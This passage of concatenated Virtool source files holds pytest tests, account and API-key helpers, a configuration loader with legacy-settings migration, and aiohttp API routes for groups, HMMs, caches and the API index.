if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
assert resp.status == 204
if field == "group":
expected = {
**document,
"groups": []
}
else:
expected = {
**document,
"users": []
}
assert await client.db.references.find_one() == expected
```
#### File: virtool/tests/test_dispatcher.py
```python
import pytest
import virtool.api
from virtool.dispatcher import Dispatcher
class TestConnection:
def test_init(self, test_ws_connection):
"""
Test that :meth:`.Connection.__init__` draws attributes from the passed session and websocket handler.
"""
assert test_ws_connection.user_id == "test"
assert test_ws_connection.groups == ["admin", "test"]
assert test_ws_connection.permissions == ["create_sample"]
async def test_send(self, test_ws_connection):
await test_ws_connection.send({
"interface": "users",
"operation": "update",
"data": {
"user_id": "john",
"groups": []
}
})
assert test_ws_connection._ws.send_json.stub.call_args[0] == ({
'data': {
'groups': [],
'user_id': 'john'
},
'interface': 'users',
'operation': 'update'
}, virtool.api.dumps)
async def test_close(self, test_ws_connection):
await test_ws_connection.close()
assert test_ws_connection._ws.close.stub.called
def test_add_connection(mocker):
dispatcher = Dispatcher()
m = mocker.Mock()
dispatcher.add_connection(m)
assert m in dispatcher.connections
def test_remove_connection(mocker):
dispatcher = Dispatcher()
m = mocker.Mock()
dispatcher.add_connection(m)
assert m in dispatcher.connections
dispatcher.remove_connection(m)
assert dispatcher.connections == []
async def test_dispatch_authorized(create_test_connection):
"""
Test if an authorized connection can have a message dispatched through it using its ``send`` method.
"""
dispatcher = Dispatcher()
m = create_test_connection()
m.user_id = "test"
dispatcher.add_connection(m)
await dispatcher.dispatch("otus", "update", {"test": True})
m.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
async def test_dispatch_unauthorized(create_test_connection):
"""
    Test that an unauthorized connection does not have its ``send`` method called during a dispatch.
"""
dispatcher = Dispatcher()
m = create_test_connection()
m.user_id = None
dispatcher.add_connection(m)
await dispatcher.dispatch("otus", "update", {"test": True})
m.send_stub.assert_not_called()
async def test_dispatch_either(create_test_connection):
"""
    Test that only the authorized connection has its ``send`` method called when one authorized and one
    unauthorized connection are managed by the dispatcher.
"""
dispatcher = Dispatcher()
m_authorized = create_test_connection()
m_authorized.user_id = "test"
m_unauthorized = create_test_connection()
m_unauthorized.user_id = None
dispatcher.add_connection(m_authorized)
dispatcher.add_connection(m_unauthorized)
await dispatcher.dispatch("otus", "update", {"test": True})
m_authorized.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
m_unauthorized.send_stub.assert_not_called()
async def test_dispatch_specific(create_test_connection):
"""
Test that only the connection passed in the keyword argument ``connections`` has its ``send`` method called when
a dispatch occurs.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
m_3 = create_test_connection()
m_3.user_id = "test"
for m in (m_1, m_2, m_3):
dispatcher.add_connection(m)
await dispatcher.dispatch("otus", "update", {"test": True}, connections=[m_2])
m_1.send_stub.assert_not_called()
m_2.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
m_3.send_stub.assert_not_called()
async def test_callable_filter(create_test_connection):
"""
Test that the ``conn_filter`` keyword argument properly filters connections and dispatches to them.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
await dispatcher.dispatch("otus", "update", {"test": True}, conn_filter=lambda conn: conn.user_id == "bob")
m_1.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
m_2.send_stub.assert_not_called()
async def test_non_callable_filter():
"""
    Test that passing a non-callable ``conn_filter`` keyword argument raises a specific ``TypeError``.
"""
with pytest.raises(TypeError) as err:
await Dispatcher().dispatch("otus", "update", {"test": True}, conn_filter=True)
assert "conn_filter must be callable" in str(err.value)
async def test_callable_modifier(create_test_connection):
"""
Test that the ``conn_modifier`` keyword argument properly modifies connection objects.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
def apply_male(conn):
conn.groups = ["men"]
await dispatcher.dispatch("otus", "update", {"test": True}, conn_modifier=apply_male)
assert m_1.groups == ["men"]
assert m_2.groups == ["men"]
async def test_not_callable_modifier():
"""
    Test that a non-callable ``conn_modifier`` raises a specific ``TypeError``.
"""
with pytest.raises(TypeError) as err:
await Dispatcher().dispatch("otus", "update", {"test": True}, conn_modifier="abc")
assert "conn_modifier must be callable" in str(err.value)
async def test_modifier_filter(create_test_connection):
"""
Test that the ``conn_modifier`` keyword argument only modifies connection objects that pass ``conn_filter``.
"""
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_1.groups = None
m_2 = create_test_connection()
m_2.user_id = "fred"
m_2.groups = None
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
def apply_male(conn):
conn.groups = ["men"]
await dispatcher.dispatch(
"otus", "update", {"test": True},
conn_filter=lambda conn: conn.user_id == "bob",
conn_modifier=apply_male
)
assert m_1.groups == ["men"]
assert m_2.groups is None
async def test_writer(create_test_connection):
"""
Test that a writer can properly modify and write a message to the passed connection.
"""
async def writer(connection, message):
if connection.user_id == "bob":
message["data"]["test"] = False
await connection.send(message)
dispatcher = Dispatcher()
m_1 = create_test_connection()
m_1.user_id = "bob"
m_2 = create_test_connection()
m_2.user_id = "fred"
dispatcher.add_connection(m_1)
dispatcher.add_connection(m_2)
await dispatcher.dispatch("otus", "update", {"test": True}, writer=writer)
m_1.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": False
}
})
m_2.send_stub.assert_called_with({
"interface": "otus",
"operation": "update",
"data": {
"test": True
}
})
async def test_writer_not_callable():
"""
    Test that a non-callable ``writer`` raises a specific ``TypeError``.
"""
with pytest.raises(TypeError) as excinfo:
await Dispatcher().dispatch("otus", "update", {"test": True}, writer="writer")
assert "writer must be callable" in str(excinfo.value)
```
#### File: virtool/tests/test_utils.py
```python
import datetime
import os
import shutil
import sys
import arrow
import pytest
import virtool.utils
@pytest.fixture
def fake_dir(tmpdir):
file_1 = tmpdir.join("hello.txt")
file_2 = tmpdir.join("world.txt")
file_1.write("hello world")
file_2.write("this is a test file")
return tmpdir
@pytest.fixture(scope="session")
def alphanumeric():
return "abcdefghijklmnopqrstuvwxyz1234567890"
@pytest.fixture(scope="function")
def randomizer():
source = ["abc123", "jkl932", "90r2ja", "87e9wa", "skk342", "skl1qq"]
def function():
return source.pop()
return function
@pytest.fixture(scope="function")
def collection():
return [
{
"id": 0,
"name": "lambert"
},
{
"id": 1,
"name": "winston"
},
{
"id": 2,
"name": "stuart"
},
]
def test_decompress_tgz(tmpdir):
path = str(tmpdir)
src_path = os.path.join(sys.path[0], "tests", "test_files", "virtool.tar.gz")
shutil.copy(src_path, path)
virtool.utils.decompress_tgz(os.path.join(path, "virtool.tar.gz"), os.path.join(path, "de"))
assert set(os.listdir(path)) == {"virtool.tar.gz", "de"}
assert os.listdir(os.path.join(path, "de")) == ["virtool"]
assert set(os.listdir(os.path.join(path, "de", "virtool"))) == {"run", "client", "VERSION", "install.sh"}
class TestRm:
def test_rm_file(self, fake_dir):
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt"}
path = os.path.join(str(fake_dir), "world.txt")
virtool.utils.rm(path)
assert set(os.listdir(str(fake_dir))) == {"hello.txt"}
def test_rm_folder(self, fake_dir):
fake_dir.mkdir("dummy")
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt", "dummy"}
path = os.path.join(str(fake_dir), "dummy")
with pytest.raises(IsADirectoryError):
virtool.utils.rm(path)
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt", "dummy"}
def test_rm_folder_recursive(self, fake_dir):
fake_dir.mkdir("dummy_recursive")
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt", "dummy_recursive"}
path = os.path.join(str(fake_dir), "dummy_recursive")
virtool.utils.rm(path, recursive=True)
assert set(os.listdir(str(fake_dir))) == {"hello.txt", "world.txt"}
def test_timestamp(mocker):
"""
Test that the timestamp util returns a datetime object with the last 3 digits of the microsecond frame set to
zero.
"""
m = mocker.Mock(return_value=arrow.Arrow(2017, 10, 6, 20, 0, 0, 612304))
mocker.patch("arrow.utcnow", new=m)
timestamp = virtool.utils.timestamp()
assert isinstance(timestamp, datetime.datetime)
assert timestamp == arrow.arrow.Arrow(2017, 10, 6, 20, 0, 0, 612000).naive
class TestRandomAlphanumeric:
def test_default(self, alphanumeric):
for _ in range(0, 10):
an = virtool.utils.random_alphanumeric()
assert len(an) == 6
assert all(l in alphanumeric for l in an)
def test_length(self, alphanumeric):
for length in [7, 10, 25, 12, 4, 22, 17, 30, 8, 14, 19]:
an = virtool.utils.random_alphanumeric(length)
assert len(an) == length
assert all(l in alphanumeric for l in an)
def test_excluded(self, alphanumeric):
for _ in range(0, 5):
an = virtool.utils.random_alphanumeric(excluded=["87e9wa"])
assert an != "87e9wa"
assert len(an) == 6
assert all(l in alphanumeric for l in an)
class TestAverageList:
def test_default(self):
list1 = [2, 5, 6, 10, 14, 20]
list2 = [-1, 3, 0, 22, 12, 11]
expected = [0.5, 4, 3, 16, 13, 15.5]
assert virtool.utils.average_list(list1, list2) == expected
def test_mismatched(self):
with pytest.raises(TypeError):
virtool.utils.average_list([1, 3, 2, 4], [2, 3, 7])
def test_wrong_item_type(self):
with pytest.raises(TypeError):
virtool.utils.average_list([2, 5, 6], [8, "a", 5])
def test_wrong_arg_type(self):
with pytest.raises(TypeError):
virtool.utils.average_list([2, 5, 6], "a")
```
#### File: virtool/account/db.py
```python
import virtool.account.utils
import virtool.db.core
import virtool.users.db
import virtool.users.utils
import virtool.utils
PROJECTION = [
"_id",
"administrator",
"email",
"groups",
"identicon",
"last_password_change",
"permissions",
"primary_group",
"settings"
]
def compose_password_update(user_id: str, old_password: str, password: str) -> dict:
"""
Compose an update dict for self-changing a users account password. This will disable forced reset and won't
invalidate current sessions, unlike a password change by an administrator.
:param user_id: the id of the user to be updated
:param old_password: the old password for authorization
    :param password: the new password
:return: a password update
"""
    # Unlike an administrator-driven password change, this update does not force a reset or invalidate existing
    # sessions, so current clients stay logged in.
    return {
        "password": virtool.users.utils.hash_password(password),
"invalidate_sessions": False,
"last_password_change": virtool.utils.timestamp(),
"force_reset": False
}
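# Sketch of intended use of compose_password_update (illustrative only; the caller,
# the `db` handle, and the collection name below are assumptions, not part of this
# module):
#
#     update = compose_password_update(user_id, old_password, password)
#     await db.users.update_one({"_id": user_id}, {"$set": update})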
async def get_alternate_id(db: virtool.db.core.DB, name: str) -> str:
"""
Get an alternate id for an API key whose provided `name` is not unique. Appends an integer suffix to the end of the
`name`.
:param db: the application database object
:param name: the API key name
:return: an alternate unique id for the key
"""
existing_alt_ids = await db.keys.distinct("id")
suffix = 0
while True:
candidate = f"{name.lower()}_{suffix}"
if candidate not in existing_alt_ids:
return candidate
suffix += 1
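# Example for get_alternate_id: if keys named "foo_0" and "foo_1" already exist,
# passing name="Foo" yields "foo_2"; with no clashes the result is "foo_0".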
async def create_api_key(db: virtool.db.core.DB, name: str, permissions: dict, user_id: str):
"""
Create a new API key for the account with the given `user_id`.
API keys can only receive permissions possessed by the owner of the API key. If the owner is an administrator, their
key permissions will not be limited.
Actions that require administrator status cannot be performed using API key authentication.
:param db: the application database object
:param name: a display name for the API key
:param permissions: permissions to provide to the API key
:param user_id: the id of the owning user
:return: the API key document
"""
user = await db.users.find_one(user_id, ["administrator", "groups", "permissions"])
key_permissions = {
**virtool.users.utils.generate_base_permissions(),
**permissions
}
if not user["administrator"]:
key_permissions = virtool.users.utils.limit_permissions(key_permissions, user["permissions"])
raw, hashed = virtool.account.utils.generate_api_key()
document = {
"_id": hashed,
"id": await virtool.account.db.get_alternate_id(db, name),
"name": name,
"groups": user["groups"],
"permissions": key_permissions,
"created_at": virtool.utils.timestamp(),
"user": {
"id": user_id
}
}
await db.keys.insert_one(document)
del document["_id"]
del document["user"]
document["key"] = raw
return document
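# Note on create_api_key: the raw key is only present in the returned document
# (under "key"); the database stores just the hashed value as `_id`, so the raw
# key cannot be recovered later and should be surfaced to the user immediately.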
```
#### File: virtool/caches/api.py
```python
import virtool.analyses.utils
import virtool.caches.db
import virtool.users.db
import virtool.db.utils
import virtool.http.routes
import virtool.validators
import virtool.utils
from virtool.api import json_response, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/caches/{cache_id}")
async def get(req):
"""
Return the complete representation for the cache with the given `cache_id`.
"""
db = req.app["db"]
cache_id = req.match_info["cache_id"]
cache = await virtool.caches.db.get(db, cache_id)
if cache is None:
return not_found()
return json_response(cache)
```
#### File: virtool/virtool/config.py
```python
import argparse
import json
import logging
import os
import psutil
import sys
import urllib.parse
import cerberus
import pymongo
import virtool.settings.db
import virtool.db.utils
import virtool.resources
import virtool.settings.schema
import virtool.utils
logger = logging.getLogger(__name__)
PATH = os.path.join(sys.path[0], "config.json")
LEGACY_PATH = os.path.join(sys.path[0], "settings.json")
SCHEMA = {
# HTTP Server
"host": {
"type": "string",
"default": "localhost"
},
"port": {
"type": "integer",
"coerce": int,
"default": 9950
},
# File paths
"data_path": {
"type": "string",
"default": "data"
},
"watch_path": {
"type": "string",
"default": "watch"
},
# Host resource limits
"proc": {
"type": "integer",
"coerce": int,
"default": 8
},
"mem": {
"type": "integer",
"coerce": int,
"default": 16
},
# Job Limits
"lg_proc": {
"type": "integer",
"coerce": int,
"default": 8
},
"lg_mem": {
"type": "integer",
"coerce": int,
"default": 16
},
"sm_proc": {
"type": "integer",
"coerce": int,
"default": 2
},
"sm_mem": {
"type": "integer",
"coerce": int,
"default": 4
},
# MongoDB
"db_connection_string": {
"type": "string",
"default": ""
},
"db_name": {
"type": "string",
"default": ""
},
# Proxy
"proxy": {
"type": "string",
"default": ""
},
"force_setup": {
"type": "boolean",
"coerce": virtool.utils.to_bool,
"default": False
},
"force_version": {
"type": "string",
"default": ""
}
}
JOB_LIMIT_KEYS = (
"lg_proc",
"lg_mem",
"sm_proc",
"sm_mem"
)
LEGACY_SM_JOB_LIMIT_KEYS = (
"build_index",
"create_sample",
"create_subtraction",
)
LEGACY_LG_JOB_LIMIT_KEYS = (
"pathoscope_bowtie",
"nuvs"
)
RESOURCE_TYPES = (
"proc",
"mem"
)
def coerce(key, value):
try:
func = SCHEMA[key]["coerce"]
except KeyError:
return value
return func(value)
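# For example, coerce("port", "9950") returns the integer 9950, while keys whose
# SCHEMA entry defines no "coerce" function are returned unchanged.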
def file_exists():
for filename in ["config.json", "settings.json"]:
path = os.path.join(sys.path[0], filename)
if os.path.exists(path):
return True
return False
def get_defaults():
return {key: SCHEMA[key]["default"] for key in SCHEMA}
def get_from_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"-H", "--host",
dest="host",
default=None,
help="the hostname the HTTP server should listen on"
)
parser.add_argument(
"-p", "--port",
dest="port",
default=None,
help="the port the HTTP server should listen on"
)
parser.add_argument(
"-d", "--data-path",
dest="data_path",
default=None,
help="the location to read and write data files to",
metavar="PATH"
)
parser.add_argument(
"-w", "--watch-path",
dest="watch_path",
default=None,
help="a location to continually retrieve sequencing files from",
metavar="PATH"
)
parser.add_argument(
"--proc",
dest="proc",
default=None,
help="the processor limit for this Virtool and its subprocesses"
)
parser.add_argument(
"--mem",
dest="mem",
default=None,
help="the memory limit (GB) for this Virtool and its subprocesses"
)
parser.add_argument(
"--db",
dest="db_connection_string",
default=None,
help="the MongoDB connection string"
)
parser.add_argument(
"--db-name",
dest="db_name",
default=None,
help="the MongoDB database name"
)
parser.add_argument(
"--lg-proc",
dest="lg_proc",
default=None,
help="processor limit for large jobs",
metavar="PROC"
)
parser.add_argument(
"--lg-mem",
dest="lg_mem",
default=None,
help="memory limit for large jobs",
metavar="MEM"
)
parser.add_argument(
"--sm-proc",
dest="sm_proc",
default=None,
help="processor limit for small jobs",
metavar="PROC"
)
parser.add_argument(
"--sm-mem",
dest="sm_mem",
default=None,
help="memory limit for small jobs",
metavar="MEM"
)
parser.add_argument(
"--no-client",
action="store_true",
default=False,
dest="no_client",
help="run without serving client files"
)
parser.add_argument(
"--no-db-checks",
action="store_true",
default=False,
dest="no_db_checks",
help="disable validating and repairing database on start"
)
parser.add_argument(
"--no-file-manager",
action="store_true",
default=False,
dest="no_file_manager",
help="disable the file manager"
)
parser.add_argument(
"--no-job-manager",
action="store_true",
default=False,
dest="no_job_manager",
help="disable the job manager"
)
parser.add_argument(
"--no-refreshing",
action="store_true",
default=False,
dest="no_refreshing",
help="disable automatic checking for reference, HMM, and software releases"
)
parser.add_argument(
"--no-sentry",
action="store_true",
default=False,
dest="no_sentry",
help="disable automatic error reporting"
)
parser.add_argument(
"--no-setup",
action="store_true",
default=False,
dest="no_setup",
help="disable setup on server start"
)
parser.add_argument(
"--force-setup",
action="store_true",
default=False,
dest="force_setup",
help="force the server to start in setup mode"
)
parser.add_argument(
"--force-version",
dest="force_version",
const="v0.0.0",
help="make the server think it is the passed VERSION (default=v0.0.0)",
metavar="VERSION",
nargs="?"
)
parser.add_argument(
"--dev",
action="store_true",
default=False,
dest="dev",
help="run in dev mode"
)
parser.add_argument(
"-v", "--verbose",
action="store_true",
dest="verbose",
default=False,
help="log debug messages"
)
args = vars(parser.parse_args())
return {key: value for key, value in args.items() if value is not None}
def get_from_env() -> dict:
settings = dict()
for key in SCHEMA:
name = "VT_" + key.upper()
try:
settings[key] = os.environ[name]
except KeyError:
pass
return settings
def load_from_file() -> dict:
try:
with open(PATH, "r") as f:
return json.load(f)
except IOError:
return dict()
def migrate():
"""
Migrates old settings style to that introduced in `v3.3.0`.
    - moves database-stored settings that are still in `settings.json` to the `settings` database collection.
- changes name of config file from `settings.json` to `config.json`
- writes only non-default config values to `config.json`
"""
# Load the legacy `settings.json` file. Return immediately if it is not found.
try:
with open(LEGACY_PATH, "r") as f:
config = json.load(f)
except IOError:
return None
# Convert database settings to a single connection string.
convert_db(config)
db = pymongo.MongoClient(config["db_connection_string"])[config["db_name"]]
# Move settings that should be in database to database.
v = cerberus.Validator(virtool.settings.schema.SCHEMA, purge_unknown=True)
v.validate(config)
db.settings.update_one({"_id": "settings"}, {
"$set": v.document
}, upsert=True)
# Rewrite settings file without DB-stored settings.
v = cerberus.Validator(schema=SCHEMA, purge_unknown=True)
v.validate(config)
convert_http(config)
convert_job_limits(config)
convert_proxy(config)
remove_defaults(config)
config = dict(v.document)
remove_defaults(config)
virtool.config.write_to_file(config)
os.remove(LEGACY_PATH)
def convert_db(config: dict):
"""
    Convert legacy database settings to a single connection string keyed by `db_connection_string` and remove all
    legacy database settings.
    This function updates `settings` in-place.
:param config: legacy settings
"""
db_host = config.pop("db_host")
db_port = config.pop("db_port")
db_name = config["db_name"]
auth_string = ""
ssl_string = ""
username = config.pop("db_username")
password = config.pop("db_password")
use_auth = config.pop("db_use_auth")
use_ssl = config.pop("db_use_ssl")
if use_auth and username and password:
username = urllib.parse.quote_plus(username)
password = urllib.parse.quote_plus(password)
auth_string = f"{username}:{password}@"
# Only use SSL if enabled and auth is configured.
if use_ssl:
ssl_string += "?ssl=true"
config["db_connection_string"] = f"mongodb://{auth_string}{db_host}:{db_port}/{db_name}{ssl_string}"
config["db_name"] = config["db_name"]
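# Illustrative result of convert_db (values are made up): with db_host="localhost",
# db_port=27017, db_name="virtool", auth enabled with username "vt" and password
# "secret", and SSL enabled, the connection string becomes
# "mongodb://vt:secret@localhost:27017/virtool?ssl=true".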
def convert_http(config: dict):
config["host"] = config.pop("server_host", "localhost")
config["port"] = config.pop("server_port", 9950)
def convert_job_limits(config: dict):
"""
Remove old task-specific limit settings and replace them with `lg_proc`, `lg_mem`, `sm_proc`, and `sm_mem`.
This function updates `settings` in-place.
:param config: legacy settings
"""
# Combine legacy job limits to lg scheme.
for resource in RESOURCE_TYPES:
config[f"lg_{resource}"] = max(config[f"{key}_{resource}"] for key in LEGACY_LG_JOB_LIMIT_KEYS)
config[f"sm_{resource}"] = max(config[f"{key}_{resource}"] for key in LEGACY_SM_JOB_LIMIT_KEYS)
for key in [*LEGACY_LG_JOB_LIMIT_KEYS, *LEGACY_SM_JOB_LIMIT_KEYS]:
del config[f"{key}_{resource}"]
for key in list(config.keys()):
if "_inst" in key or "dummy" in key:
del config[key]
def convert_proxy(config: dict):
"""
Transform proxy settings into a single connection string keyed by `proxy` and remove the old proxy settings keys.
This function updates `settings` in-place.
:param config: legacy settings
"""
address = config.pop("proxy_address")
enable = config.pop("proxy_enable")
password = config.pop("proxy_password")
trust = config.pop("proxy_trust")
username = config.pop("proxy_username")
if trust or not enable or not address:
config["proxy"] = ""
elif username and password:
prefix, suffix = address.split("//")
config["proxy"] = f"{prefix}//{username}:{password}@{suffix}"
else:
config["proxy"] = address
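# Illustrative outcomes of convert_proxy (values are made up): an enabled proxy at
# "http://proxy.example.com:3128" with username "u" and password "p" becomes
# "http://u:p@proxy.example.com:3128"; if proxy_trust is set or the proxy is
# disabled, the result is an empty string.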
def remove_defaults(config: dict):
"""
Remove all config pairs where the value matches the default settings. This keeps the config file minimal.
This function modifies the `config` in-place.
:param config: config dict
"""
defaults = get_defaults()
for key in defaults:
if key in config and defaults[key] == config[key]:
config.pop(key, None)
def resolve() -> dict:
"""
    Calculate and return all non-database-stored settings based on command line options, `config.json` content, and
    environment variables.
    :return: the resolved configuration dict
"""
migrate()
from_file = load_from_file()
from_args = get_from_args()
from_env = get_from_env()
from_defaults = get_defaults()
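    # Precedence, lowest to highest: defaults < environment < config file < CLI
    # arguments; later unpacked dicts overwrite earlier keys.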
resolved = {**from_defaults, **from_env, **from_file, **from_args}
coerced = {key: coerce(key, value) for key, value in resolved.items()}
validate_limits(coerced)
return coerced
def should_do_setup(config):
if config["force_setup"]:
return True
if config["no_setup"]:
return False
return not file_exists()
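# In should_do_setup, force_setup wins over no_setup; otherwise setup runs only
# when no config file exists yet.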
def validate_limits(config):
cpu_count = psutil.cpu_count()
mem_total = psutil.virtual_memory().total
proc = int(config["proc"])
mem = int(config["mem"])
fatal = False
if proc > cpu_count:
fatal = True
logger.fatal(f"Configured proc limit ({proc}) exceeds host CPU count ({cpu_count})")
in_bytes = mem * 1024 * 1024 * 1024
if in_bytes > mem_total:
fatal = True
logger.fatal(f"Configured mem limit ({in_bytes}) exceeds host memory ({mem_total})")
for job_limit_key in JOB_LIMIT_KEYS:
resource_key = job_limit_key.split("_")[1]
job_limit = int(config[job_limit_key])
host_limit = int(config[resource_key])
if job_limit > host_limit:
fatal = True
logger.fatal(
f"Configured {job_limit_key} ({job_limit}) exceeds instance {resource_key} limit ({host_limit})"
)
if fatal:
sys.exit(1)
return cpu_count, mem_total
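# For example, on a 4-core host a configured proc of 8 takes the fatal branch in
# validate_limits above and the process exits with status 1.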
def write_to_file(data):
with open(PATH, "w") as f:
json_string = json.dumps(data, indent=4, sort_keys=True)
f.write(json_string)
```
#### File: virtool/groups/api.py
```python
import pymongo.errors
import virtool.groups.db
import virtool.users.db
import virtool.http.routes
import virtool.users.utils
import virtool.utils
import virtool.validators
from virtool.api import bad_request, json_response, no_content, not_found
routes = virtool.http.routes.Routes()
@routes.get("/api/groups")
async def find(req):
"""
Get a list of all existing group documents.
"""
cursor = req.app["db"].groups.find()
return json_response([virtool.utils.base_processor(d) async for d in cursor])
@routes.post("/api/groups", admin=True, schema={
"group_id": {
"type": "string",
"coerce": virtool.validators.strip,
"empty": False,
"required": True
}
})
async def create(req):
"""
Adds a new user group.
"""
db, data = req.app["db"], req["data"]
document = {
"_id": data["group_id"].lower(),
"permissions": virtool.users.utils.generate_base_permissions()
}
try:
await db.groups.insert_one(document)
except pymongo.errors.DuplicateKeyError:
return bad_request("Group already exists")
headers = {
"Location": "/api/groups/" + data["group_id"]
}
return json_response(virtool.utils.base_processor(document), status=201, headers=headers)
@routes.get("/api/groups/{group_id}")
async def get(req):
"""
Gets a complete group document.
"""
document = await req.app["db"].groups.find_one(req.match_info["group_id"])
if document:
return json_response(virtool.utils.base_processor(document))
return not_found()
@routes.patch("/api/groups/{group_id}", admin=True, schema={
"permissions": {
"type": "dict",
"default": {},
"validator": virtool.validators.is_permission_dict
}
})
async def update_permissions(req):
"""
Updates the permissions of a given group.
"""
db = req.app["db"]
data = req["data"]
group_id = req.match_info["group_id"]
old_document = await db.groups.find_one({"_id": group_id}, ["permissions"])
if not old_document:
return not_found()
old_document["permissions"].update(data["permissions"])
# Get the current permissions dict for the passed group id.
document = await db.groups.find_one_and_update({"_id": group_id}, {
"$set": {
"permissions": old_document["permissions"]
}
})
await virtool.groups.db.update_member_users(db, group_id)
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/groups/{group_id}", admin=True)
async def remove(req):
"""
Remove a group.
"""
db = req.app["db"]
group_id = req.match_info["group_id"]
delete_result = await db.groups.delete_one({"_id": group_id})
if not delete_result.deleted_count:
return not_found()
await virtool.groups.db.update_member_users(db, group_id, remove=True)
return no_content()
```
#### File: virtool/hmm/api.py
```python
import os
import aiohttp
import aiojobs.aiohttp
import virtool.db.utils
import virtool.errors
import virtool.github
import virtool.hmm.db
import virtool.http.routes
import virtool.processes.db
import virtool.utils
from virtool.api import bad_gateway, bad_request, compose_regex_query, conflict, json_response, no_content, \
not_found, paginate
routes = virtool.http.routes.Routes()
@routes.get("/api/hmms")
async def find(req):
"""
Find HMM annotation documents.
"""
db = req.app["db"]
term = req.query.get("find", None)
db_query = dict()
if term:
db_query.update(compose_regex_query(term, ["names"]))
data = await paginate(
db.hmm,
db_query,
req.query,
sort="cluster",
projection=virtool.hmm.db.PROJECTION,
base_query={"hidden": False}
)
data["status"] = await virtool.hmm.db.get_status(db)
return json_response(data)
@routes.get("/api/hmms/status")
async def get_status(req):
db = req.app["db"]
status = await virtool.hmm.db.get_status(db)
return json_response(status)
@routes.get("/api/hmms/status/release")
async def get_release(req):
try:
release = await virtool.hmm.db.fetch_and_update_release(req.app)
except virtool.errors.GitHubError as err:
if "404" in str(err):
return bad_gateway("GitHub repository does not exist")
raise
except aiohttp.ClientConnectorError:
return bad_gateway("Could not reach GitHub")
if release is None:
return not_found("Release not found")
return json_response(release)
@routes.get("/api/hmms/status/updates")
async def list_updates(req):
"""
List all updates applied to the HMM collection.
"""
db = req.app["db"]
updates = await virtool.db.utils.get_one_field(db.status, "updates", "hmm") or list()
updates.reverse()
return json_response(updates)
@routes.post("/api/hmms/status/updates", permission="modify_hmm")
async def install(req):
"""
Install the latest official HMM database from GitHub.
"""
db = req.app["db"]
user_id = req["client"].user_id
if await db.status.count({"_id": "hmm", "updates.ready": False}):
return conflict("Install already in progress")
process = await virtool.processes.db.register(
db,
"install_hmms"
)
document = await db.status.find_one_and_update({"_id": "hmm"}, {
"$set": {
"process": {
"id": process["id"]
}
}
})
release = document.get("release", None)
if release is None:
return bad_request("Target release does not exist")
update = virtool.github.create_update_subdocument(release, False, user_id)
await db.status.update_one({"_id": "hmm"}, {
"$push": {
"updates": update
}
})
await aiojobs.aiohttp.spawn(req, virtool.hmm.db.install(
req.app,
process["id"],
release,
user_id
))
return json_response(update)
@routes.get("/api/hmms/{hmm_id}")
async def get(req):
"""
Get a complete individual HMM annotation document.
"""
document = await req.app["db"].hmm.find_one({"_id": req.match_info["hmm_id"]})
if document is None:
return not_found()
return json_response(virtool.utils.base_processor(document))
@routes.delete("/api/hmms", permission="modify_hmm")
async def purge(req):
"""
Delete all unreferenced HMMs and hide the rest.
"""
db = req.app["db"]
await virtool.hmm.db.purge(db, req.app["settings"])
hmm_path = os.path.join(req.app["settings"]["data_path"], "hmm/profiles.hmm")
try:
await req.app["run_in_thread"](virtool.utils.rm, hmm_path)
except FileNotFoundError:
pass
await db.status.find_one_and_update({"_id": "hmm"}, {
"$set": {
"installed": None,
"process": None,
"updates": list()
}
})
await virtool.hmm.db.fetch_and_update_release(req.app)
return no_content()
```
#### File: virtool/http/root.py
```python
import virtool.http.routes
from virtool.api import json_response
routes = virtool.http.routes.Routes()
@routes.get("/api")
async def get(req):
"""
Returns a generic message. Used during testing for acquiring a ``session_id``.
"""
return json_response({
"endpoints": {
"account": {
"url": "/api/account",
"doc": "https://www.virtool.ca/docs/api/account.html"
            },
            "analyses": {
                "url": "/api/analyses",
"doc": "https://www.virtool.ca/docs/api/analyses.html"
            },
            "genbank": {
                "url": "/api/genbank",
"doc": "https://www.virtool.ca/docs/api/genbank.html"
            },
            "groups": {
                "url": "/api/groups",
"doc": "https://www.virtool.ca/docs/api/groups.html"
            },
            "hmm": {
                "url": "/api/hmms",
"doc": "https://www.virtool.ca/docs/api/hmm.html"
            },
            "history": {
                "url": "/api/history",
"doc": "https://www.virtool.ca/docs/api/history.html"
            },
            "indexes": {
                "url": "/api/indexes",
"doc": "https://www.virtool.ca/docs/api/indexes.html"
},
"jobs": {
"url": "/api/jobs",
"doc": "https://www.virtool.ca/docs/api/jobs.html"
},
"otus": {
"url": "/api/otus",
"doc": "https://www.virtool.ca/docs/api/otus.html"
            },
            "processes": {
                "url": "/api/processes",
"doc": "https://www.virtool.ca/docs/api/processes.html"
},
"references": {
"url": "/api/references",
"doc": "https://www.virtool.ca/docs/api/references.html"
},
"samples": {
"url": "/api/samples",
"doc": "https://www.virtool.ca/docs/api/samples.html"
            },
            "settings": {
                "url": "/api/settings",
"doc": "https://www.virtool.ca/docs/api/settings.html"
            },
            "subtraction": {
                "url": "/api/subtractions",
"doc": "https://www.virtool.ca/docs/api/subtraction.html"
            },
            "users": {
                "url": "/api/users",
"doc": "https://www.virtool.ca/docs/api/users.html"
}
},
"version": req.app["version"]
})
```
#### File: virtool/indexes/api.py
```python
import virtool.history.db
